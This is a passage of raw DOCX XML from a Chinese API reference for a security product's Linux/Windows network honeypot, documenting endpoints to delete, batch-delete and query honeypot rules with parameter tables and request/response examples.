            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D9CFA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FFF186C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39994A5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6094C055" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45A355AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261A6454" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D87B0DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48C65BC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAB4A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rule/70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B17E0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D9DA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5DCD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8627C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAFF66C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D68E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD1279" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则同步中不能删除，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA6F2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则启用状态不能删除，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21479BD7"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497C54" w14:paraId="09412A8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3324B11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B769B59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20328CCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E50B51E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12782006" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24091C5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C91F2C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="561B91B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB1CFA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25713E74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="批量删除规则"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r>
        <w:t>批量删除规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475AB6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐批量删除主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E52C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFAA8DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/detect/honeypot/{linux,win}/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312CD079"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225"/>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="1014"/>
        <w:gridCol w:w="6644"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="47CE5A2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F466F8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C323389" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CEFFB44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D873A23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BEA26AA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5264A949" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ABF34AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1454C4EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1313066C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:全部主机 1:自定义，包括业务组和主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4811A915" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40DA21E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B533BBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13278A92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFBAC66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27F69DA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68907759" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093F80AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6438438A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D83E50A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27CBEB13" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0AF486" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E537EE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5437ABDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C968F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="550605C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63178C63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971928D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350FE3DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5A1C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C18E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围参数不合法，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A930B17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围为自定义范围时，业务组和主机同时为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D304C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口为空，或端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D29D43"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497C54" w14:paraId="7741291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2E80262" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B04AEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B378ACA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD44AA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37AB9A7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19D1F5DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D18357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA85D99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1B8AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D5211C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="查询规则"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r>
        <w:t>查询规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60803EB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F26991" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C8A1EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/honeypot/{linux,win}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8575C"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888"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="834"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4D33F57B"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93C5DF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BED4B4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496EDE3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5050AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FD0607D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5D5A74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61640E1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="567EB060" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5541290B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="739F4E8C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38127EEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389BB93D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491E3805" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2757F002" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41953830" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14994F80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rule?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B8E9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEAB77B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.231",</w:t>
